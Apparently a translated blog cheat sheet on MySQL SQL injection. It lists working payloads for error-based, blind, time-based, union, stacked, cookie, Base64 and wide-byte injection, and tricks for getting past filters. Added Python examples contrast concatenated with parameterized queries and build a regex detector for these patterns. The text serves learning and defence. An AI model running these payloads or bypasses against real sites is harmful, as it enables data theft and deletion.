SQL injection summary learning

By type

Integer type

Character type

According to the HTTP submission method

GET injection

POST injection

Cookie injection

According to injection method

Error-based injection

Error-based injection relies on floor(), updatexml() and extractvalue(); the error messages produced through updatexml() and extractvalue() are limited to 32 characters per extraction.

floor() and rand()

union select count(*),2,concat(':',(select database()),':',floor(rand()*2))as a from information_schema.tables group by a       /* use the error message to obtain the current database name */

extractvalue()

id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))

updatexml()

id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1))

geometrycollection()

id=1 and geometrycollection((select * from(select * from(select user())a)b))

multipoint()

id=1 and multipoint((select * from(select * from(select user())a)b))

polygon()

id=1 and polygon((select * from(select * from(select user())a)b))

multipolygon()

id=1 and multipolygon((select * from(select * from(select user())a)b))

linestring()

id=1 and linestring((select * from(select * from(select user())a)b))

multilinestring()

id=1 and multilinestring((select * from(select * from(select user())a)b))

exp()

id=1 and exp(~(select * from(select user())a))

procedure analyse()

Works wherever errors are reported; it can also be used at an injection point that sits after a limit clause.

Time-based injection

id = 1 and if(length(database())>1,sleep(5),1)

Blind injection

Functions used

length(str): returns the length of the string str

substr(str, pos, len): returns len characters of str starting at position pos. Note that pos starts at 1, not at 0 as in arrays

mid(str, pos, len): same as above, extracts a substring

ascii(str): returns the ASCII code of the leftmost character of the string str

ord(str): converts a character or Boolean value to its ASCII code

if(a,b,c): a is the condition; if a is true, returns b, otherwise returns c. For example, if(1>2,1,0) returns 0

Boolean-based blind

and ascii(substr((select database()),1,1))>64 /* test whether the ASCII value of the first character of the database name is greater than 64 */

Time-based blind

id=1 union select if(SUBSTRING(user(),1,1)='root',sleep(4),1),null,null /* test the first character of the user name: delay 4 seconds if it matches, otherwise return 1 */

Union injection

id =-1 union select 1,2,3   /* determine the number of columns */

Boolean injection

id=1' and substr(database(),1,1)='t'--+     /* test the database name */

Cookie injection

When the URL carries no request parameter but a result still comes back, check whether the request parameter is carried in the cookie, then apply the usual injection tests inside the cookie. The injection position is the cookie, but otherwise this is no different from injection in the URL.
Cookie: id = 1 and 1=1

Stacked query injection

id = 1';select if(substr(user(),1,1)='r',sleep(3),1)%23

Introduction to stacked injection

Stacked injection (stacked queries): as the name suggests, several SQL statements are executed together, and real applications do allow this. In MySQL, mainly on the command line, each statement is terminated with ; to mark its end, which raises the question of whether several statements can be submitted at once. That is what stacked injection means.

Principle

In SQL a semicolon (;) marks the end of a statement. If the next statement is appended after a finished one, will both be executed? That idea is what gives rise to stacked injection. Union injection also joins two statements together, so what is the difference? union and union all can only combine query statements, while stacked injection can execute arbitrary statements.

The limitation of stacked injection is that it does not work in every environment: the API or database engine may not support it, and insufficient permissions can also explain why an attacker cannot modify data or call certain programs.

Although stacked queries can execute arbitrary SQL statements, this injection method is not perfect. Because web application code usually returns only one query result, any error or result produced by the second statement of the stack is ignored and cannot be seen on the front-end page.

Therefore, union injection is recommended for reading data. Before using stacked injection, database information such as table names and column names must also already be known.

[Screenshots omitted; caption: "Successfully deleted"]

tips:

  1. Not all environments support stacked injection (Oracle, for example)
  2. Usually only one result set is returned per query, so the output of the subsequent SQL statements may never be echoed to the page
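Added example, not from the original post: sqlite3 stands in for MySQL and the users table is constructed. It places the vulnerable string-concatenation lookup beside its parameterized form, and checks how a single-statement driver call treats a second statement appended with ';'.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory sample database (sqlite3 stands in for MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT);"
        "INSERT INTO users VALUES (1, 'alice'), (2, 'bob');"
    )
    return conn


def lookup_concat(conn: sqlite3.Connection, user_input: str) -> list[str]:
    """Vulnerable pattern: the request parameter is spliced into the SQL text,
    so 'id' becomes whatever the client wrote, operators and keywords included."""
    sql = "SELECT name FROM users WHERE id = " + user_input
    return [row[0] for row in conn.execute(sql)]


def lookup_param(conn: sqlite3.Connection, user_input: str) -> list[str]:
    """Hardened pattern: the value is bound as a parameter. The statement text
    is fixed, so the input can only ever be compared as data."""
    rows = conn.execute("SELECT name FROM users WHERE id = ?", (user_input,))
    return [row[0] for row in rows]


def stacked_statement_rejected(conn: sqlite3.Connection, user_input: str) -> bool:
    """True when the driver refuses to run a second statement appended with ';'.
    sqlite3's execute() accepts exactly one statement (it raises Warning or, in
    newer Pythons, ProgrammingError); only executescript() runs several, which
    is why executescript() must never see user-controlled text."""
    try:
        lookup_concat(conn, user_input)
    except (sqlite3.Warning, sqlite3.ProgrammingError):
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print(lookup_concat(db, "1 OR 1=1"))                          # ['alice', 'bob']
    print(lookup_param(db, "1 OR 1=1"))                           # []
    print(stacked_statement_rejected(db, "1; DELETE FROM users"))  # True
    print(lookup_param(db, "2"))                                  # ['bob']
```

With parameter binding the input is compared as a value, so neither the tautology nor the appended statement reaches the engine as SQL. In PHP against MySQL the same split exists between mysqli_query(), which sends one statement, and mysqli_multi_query(), which sends several; keeping user data out of the statement text is what closes both cases.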

Base64 injection

Base64-encode the parameters before sending the request.

Note: the Base64 encoding of the value 1' (from id=1') is MSc=, and = URL-encodes to %3d,
so the result is:

id=MSc%3d

Comments

#
-- (followed by a space) or --+
/**/
  • Inline comments:
/*!...*/

Encoding issues

wide byte injection

  • The query parameter is enclosed in single quotes, and incoming single quotes are escaped with a backslash (\), for example by addslashes() or a similar filtering function applied to the parameters before they reach the database
  • The database connection uses the GBK character set

Usage

id = -1%DF' union select 1,user(),3%23
Under the above conditions the single quote ' is escaped with a backslash (%5c), which yields %df%5c; in GBK encoding %df%5c is a traditional Chinese character (read "lian"), so the single quote escapes successfully.

  • When MySQL uses GBK encoding, it treats two bytes as one Chinese character (the first byte must have a value greater than 128 to fall in the Chinese character range)
  • The essence of wide-byte injection is that PHP and MySQL use different character sets. As long as the low-order byte range includes 0x5c, wide-byte injection can be performed.
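Added example, not from the original post: a byte-level escaper standing in for PHP's addslashes(), run on constructed GBK inputs, shows why the escaping backslash is absorbed into a two-byte character, and a charset-aware variant decodes strictly first so the malformed byte sequence is rejected instead.

```python
from typing import Optional


def addslashes_bytes(data: bytes) -> bytes:
    """Byte-level escaping like PHP addslashes(): a backslash (0x5c) is put in
    front of ' " \\ and NUL without regard to the connection character set."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def quote_survives_byte_escaping(data: bytes) -> bool:
    """Escape at byte level, then decode the way a GBK connection would, and
    report whether an unescaped single quote is left in the decoded text."""
    decoded = addslashes_bytes(data).decode("gbk", errors="replace")
    for i, ch in enumerate(decoded):
        if ch == "'" and (i == 0 or decoded[i - 1] != "\\"):
            return True
    return False


def escape_after_decode(data: bytes, charset: str = "gbk") -> Optional[str]:
    """Charset-aware handling: decode strictly first, so a high byte that is not
    followed by a valid GBK trail byte is rejected (None) instead of later
    swallowing the added backslash; then escape at character level."""
    try:
        text = data.decode(charset)
    except UnicodeDecodeError:
        return None
    return text.replace("\\", "\\\\").replace("'", "\\'")


if __name__ == "__main__":
    # Constructed inputs: a plain quote, and the %DF' pattern from the text.
    print(quote_survives_byte_escaping(b"1'"))      # False: the quote stays escaped
    print(quote_survives_byte_escaping(b"1\xdf'"))  # True: \xdf\x5c became one character
    print(escape_after_decode(b"1\xdf'"))           # None: \xdf followed by 0x27 is not valid GBK
    print(escape_after_decode("\u5f20\u4e09'".encode("gbk")))  # well-formed GBK is escaped normally
```

The practical fix is to make the escaping layer aware of the connection character set (mysqli_set_charset() rather than a bare SET NAMES query) or, better, to use prepared statements so the value is never part of the statement text.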

Differences between MySQL 5.0 and above and versions below 5.0

MySQL 5.0 and above include the INFORMATION_SCHEMA database, which holds metadata about all other databases maintained by the MySQL server: database names, the tables of each database, the data types and access privileges of table columns, and so on. Versions below 5.0 do not have it.

information_schema

System database that records the databases, tables, columns, user privileges and other information of the current MySQL instance

SCHEMATA

Stores basic information about all MySQL databases, including the database name, character set, path, etc.

TABLES

Stores information about the tables in MySQL, including whether a table is a base table or a system table, its storage engine, its row count, creation time, last update time, etc.

COLUMNS

Stores the column information of the tables in MySQL, including every column of each table and its details: which table the column belongs to, its data type, character set, privileges, comment, etc.

bypass

case bypass

double write bypass

Encoding bypass (url full encoding, hexadecimal)

Inline comment bypass

keyword substitution

comma bypass

substr() and mid() accept the from ... for form (substr(str from pos for len)), which avoids the comma;

limit accepts offset (limit N offset M), which avoids the comma

Comparison symbols ( >, < ) bypass

greatest(), between ... and

Replacement of logical symbols

  • and = &&
  • or = ||
  • xor = |
  • not = !

space bypass

Bypass with brackets, + etc.

Equivalence function bypass

  • hex(), bin() = ascii()
  • concat_ws() = group_concat()
  • mid(), substr() = substring()
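Added example, not from the original post: a small detector that undoes the obfuscations listed above (URL encoding, '+' for spaces, /**/ and /*!...*/ comments, mixed case, extra whitespace) before matching, run over constructed query strings. The rule names and sample queries are my own, not taken from the page.

```python
import re
from urllib.parse import unquote_to_bytes

# Detection rules keyed by name; each is applied to the normalized query string.
RULES = {
    "union_select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b"),
    "time_based": re.compile(r"\b(?:sleep|benchmark)\s*\("),
    "error_based": re.compile(r"\b(?:extractvalue|updatexml)\s*\("),
    "tautology": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+"),
    "schema_probe": re.compile(r"\binformation_schema\b"),
    "stacked": re.compile(r";\s*(?:select|insert|update|delete|drop|alter)\b"),
    "wide_byte_quote": re.compile(r"""[\x80-\xff]['"]"""),
}

INLINE_COMMENT = re.compile(r"/\*!\d*(.*?)\*/", re.S)  # /*!...*/: MySQL executes the body
BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)         # /*...*/: MySQL reads it as whitespace


def normalize(raw_query: str) -> str:
    """Undo the listed obfuscations so one rule set covers their variants."""
    # '+' is a space in form encoding. Decode %XX to raw bytes and map each byte
    # 1:1 to a character (latin-1) so a lone high byte such as %DF stays visible
    # instead of turning into a UTF-8 replacement character.
    text = unquote_to_bytes(raw_query.replace("+", " ")).decode("latin-1")
    text = INLINE_COMMENT.sub(r" \1 ", text)  # keep the executable body, drop the wrapper
    text = BLOCK_COMMENT.sub(" ", text)       # comment used as a separator
    return re.sub(r"\s+", " ", text).strip().lower()


def scan(raw_query: str) -> list[str]:
    """Return the names of the rules that match the normalized query."""
    norm = normalize(raw_query)
    return [name for name, rx in RULES.items() if rx.search(norm)]


# Constructed sample query strings (not captured traffic), in the page's notation.
SAMPLE_QUERIES = [
    "id=1",
    "q=the+union+of+two+sets",
    "id=1/**/UnIoN/*!SeLeCT*/1,2,3",
    "id=-1%DF%27+union+select+1,user(),3%23",
    "id=1+and+if(length(database())>1,sleep(5),1)",
    "id=1+and+(extractvalue(1,concat(0x7e,(select+user()),0x7e)))",
    "id=1';select+if(1,sleep(3),1)%23",
    "id=1+and+1=1",
]


def scan_all(queries=SAMPLE_QUERIES) -> dict[str, list[str]]:
    """Map each query to its matching rule names; an empty list means no hit."""
    return {q: scan(q) for q in queries}


if __name__ == "__main__":
    for query, hits in scan_all().items():
        print(f"{'ALERT' if hits else 'ok   '} {query!r} -> {hits}")
```

Normalizing before matching is what keeps the rule count small: UnIoN/*!SeLeCT*/ and union select hit the same rule, and decoding to latin-1 rather than UTF-8 keeps a lone %DF visible for the wide-byte rule. Rules like these are a triage signal for log review rather than a block list; tune them against the application's real traffic to keep false positives down.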

HTTP parameter pollution

HTTP Parameter Pollution (HPP): an attacker inserts specially crafted parameters into an HTTP request. If a web application is vulnerable to this, it can be used to carry out client-side or server-side attacks.

For example, when searching on Google and Baidu with the query parameter passed twice, Google loads both values as search content, while Baidu loads only the first one.

id=1 union select+1,2,3+from+users+where+id=1--
becomes
id=1 union select+1&id=2,3+from+users+where+id=1--

Buffer overflow bypass

id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--+
In 0xAAAAAAAAAAAAAAAAAAAAA, the more A's the better; there is generally a critical value. This method is also useful for bypassing suffix-name checks.

Source: blog.csdn.net/hxhxhxhxx/article/details/108921489